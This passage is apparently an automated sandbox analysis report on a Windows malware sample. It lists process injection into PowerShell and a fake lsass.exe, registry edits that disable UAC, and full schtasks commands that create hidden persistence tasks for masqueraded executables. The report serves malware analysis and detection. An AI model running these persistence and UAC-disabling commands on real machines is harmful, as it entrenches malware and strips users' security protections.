N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2756 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\MSOCache\All Users\lsass.exe
PID 2756 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\MSOCache\All Users\lsass.exe
PID 2756 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\MSOCache\All Users\lsass.exe
PID 2000 wrote to memory of 2220 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2220 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2220 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2316 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2316 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2316 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2220 wrote to memory of 828 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 2220 wrote to memory of 828 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 2220 wrote to memory of 828 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 828 wrote to memory of 1524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 1524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 1524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 2524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 2524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 2524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 1524 wrote to memory of 2596 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 1524 wrote to memory of 2596 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 1524 wrote to memory of 2596 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 2596 wrote to memory of 2380 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 2380 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 2380 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2380 wrote to memory of 2872 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe

"C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft Office\Office14\1033\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

